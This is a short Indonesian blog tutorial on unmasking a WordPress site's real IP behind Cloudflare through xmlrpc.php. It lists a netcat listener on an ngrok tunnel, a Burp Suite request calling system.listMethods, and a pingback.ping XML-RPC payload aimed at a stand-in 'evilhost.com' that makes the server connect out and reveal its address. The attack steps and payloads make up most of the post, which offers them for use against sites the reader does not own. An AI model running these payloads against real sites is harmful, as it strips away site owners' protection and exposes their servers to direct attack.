About xmlrpc.php

pada tanggal

 Hasil gambar untuk xmlrpc.php

 

Cara bypass cloudflare dengan mengetahui ip asli server tersebut dengan memanfaatkan xmlrpc.php yang diaktifkan di server tersebut


Bahan:

- localhost online (ngrok)

- Netcat untuk listening


Langkah-langkah:

- webssite.com/xmlrpc.php

- Hidupkan localhost online(ngrok) lalu listen dengan menggunakan netcat

- buka burpsuite refresh tangkap dan ubah method dari GET menjadi POST lalu masukkan script ini untuk mengetahui apakah terdapat pingback.ping di web tersebut (semua wordpress pasti punya pingback.ping bisa skip kalau males ngecek)

<?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>

- Untuk melakukan pingback.ping masukkan script dibawah ini dan arahkan kepada Localhost online kamu
 
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>evilhost.com</string></value>
</param>
<param>
<value><string>INI DIISI DENGAN SALAH SATU HALAMAN WEBNYA TERSERAH PILIH MANA MISAL https://website.com/blog/cara-membuat-website-dengan-wp/</string></value>
</param>
</params>
</methodCall>
 
- Maka real ip server akan bocor pada X-Forwarded-for: karena tidak adanya filter

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Komentar

Posting Komentar